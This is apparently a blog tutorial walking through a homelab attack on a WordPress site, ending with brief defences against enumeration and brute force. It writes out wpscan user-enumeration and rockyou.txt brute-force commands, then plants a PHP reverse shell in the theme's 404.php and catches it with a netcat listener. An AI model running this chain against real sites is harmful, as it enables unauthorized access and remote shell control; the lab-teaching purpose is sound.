When I started writing this article, I didn’t realize how popular and well-documented this attack is in various places. The good news is that protecting yourself from this type of attack is also well-documented. These are my steps to exploit my WordPress site in my homelab.
These instructions are for information purposes only. Do not run the wpscan command on a public WordPress site, you will get caught because this is a very noisy and visible attack.
This is a simple walkthrough consisting of:
- a WordPress installation
- Kali Linux
Kali Linux comes with wpscan and the default dictionaries pre-installed.
Getting WordPress Usernames
The tool for exploiting the WordPress vulnerability is ironically WPScan (WordPress Security Scanner). This is a free vulnerability tool for WordPress users to test the security and vulnerability of their sites. One of its more useful features is the ability to brute force an attack into a WordPress site.
The wpscan user enumeration option retrieves a list of registered WordPress users for the target host. User enumeration is the first step when an attacker wants to gain access to a specific target by brute force. Using the -enumerate u option, the tool scans the target for posts, pages, and custom types for authors and usernames. In our lab environment we use the following command to enumerate the users on our WordPress site:
$ wpscan --url http://192.168.1.244:8082 –enumerate u
The results from the wpscan -enumerate u command are quick and generate a few pages of output. We are interested in the User(s) Identified: section. WPScan found two users: fatman and admin.
Congratulations, you just performed user enumeration of your local WordPress site. Write these usernames down as we’ll need them in the next section.
How to Brute Force WordPress Passwords
Now that we have a list of users, we can go through the process of brute-forcing the passwords. Kali provides the mother of all password lists (rockyou.txt) so we’ll use that one for this example. Keep in mind that this is a long list and will take a lot of time to complete.
This is a very visible attack and most site admins have disabled multiple login attempts to defeat this type of attack.
In addition to the site URL, WPScan also takes two arguments: the path to the password list and the username we found in the previous step. Use the following command to brute force the password for user fatman:
wpscan –url http://192.168.1.244:8082 –rua -P /usr/share/wordlists/rockyou.txt
If the scan is successful, the results are listed in the Performing password attack on Xmlrpc against 1 user/s section. In this example, the password for user fatman is fatdrunkandstupid.
Now that we have a valid username and password combination, the attack can move to the privilege escalation stage by logging in as a valid user on the WordPress site.
Log Into the WordPress Site
Log into the site at https://192.168.1.244:8082/wp-admin to gain access to the admin shell. Use the username and password from the password cracking attack for your credentials.
For the most part, the attack is complete and it could end here with full access to the admin page.
The next step is to establish a remote shell and perform some privilege escalation.
Establishing a Remote Shell
Pentestmonkey.com is a penetration test resource page providing and a repository for remote shells. We are interested the PHP reverse shell that will work nicely for this demonstration. Download the reverse shell script from pentestmonkey.com
Locate the // CHANGE THIS TO ATTACKER area and replace the IP address of the attacking computer. Do the same for the // CHANGE THIS ATTACKER PORT NUMBER to an unused port.
$VERSION = “1.0”;
$ip = ‘192.168.1.6’; // CHANGE THIS TO ATTACKER IP
$port = 1234; // CHANGE THIS ATTACKER PORT NUMBER
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = ‘uname -a; w; id; /bin/sh -i’;
$daemon = 0;
$debug = 0;
Now that we have administrative access to the WordPress site, we can install our reverse shell.
Go to the Appearance Tap and select the Theme Editor menu.
On the far right, under Theme Files, select 404 Template (404.php).
Replace the contents of this file with the pentestmonkey php-reverse-shell code. Make sure you changed the IP address and port to the Kali Linux machine.
Click the Update File button to save your changes.
Good job, we’re done making WordPress changes and the site is ready for instructions.
Start Listening for a Connection
Kali Linux comes with Netcat installed by default. Pentesters and system administrators alike use Netcat for port listening, port redirection, port checking, network testing, and for our use, creating a reverse shell. In our walkthrough, the attacker’s Kali machine acts as a server that waits for an incoming connection from the WordPress site.
On your Kali machine use the Netcat or (nc) command to start listening for a connection using the port you set in the reverse_shell.php script in the 404.php WordPress page in the previous step.
$ nc -nlvp 1234
After issuing the command, Kali sits and patiently waits for an incoming connection.
Launch the Attack
The attack begins when your load the php file with the pentestmonkey code. You can use a web browser or better yet, use the curl command.
cURL, which stands for client URL, is a command-line tool that lets you request a web page by specifying the location (in the form of a URL) in this case, the 404.php file.
In a new Kali terminal, enter the following command (replacing the IP address and port with your WordPress site).
$ curl -v http://192.168.1.244:8082/404.php
The curl command loads the 404.php page on the WordPress server which contains the code to start a shell session to the IP address and port listed in the pentestmonkey.com script.
Go back to the terminal window where you started the Netcat listener on your Kali machine.
Congratulations, we have shell access to the WordPress site.
How to Protect Against WordPress User Enumeration Attacks
If you want to avoid WordPress user enumeration attacks, you should avoid using the username as a nickname and display name which is shown publicly in WordPress. The best option is to choose an administrator username that consists of random characters and use a different nickname. WPScan scans for usernames in the URL’s so if you won’t use the username it cannot be scanned by WPScan. Another way to prevent user enumeration is to use a different account to publish posts and answer replies.
How to Avoid WordPress Brute Force Attacks
The best way to keep attackers using brute force methods out is to limit the login attempts per IP address. There are several plug-ins available for WordPress to limit the number of login attempts for a specific username and IP, one of them is Wordfence.
The possibility of a successful WPScan exploit is pretty low because the latest WordPress versions limit login attempts by default. Make sure you limit entries to a maximum of 3 and increase lock-out time a lot after 2 lockouts (which is 6 password attempts).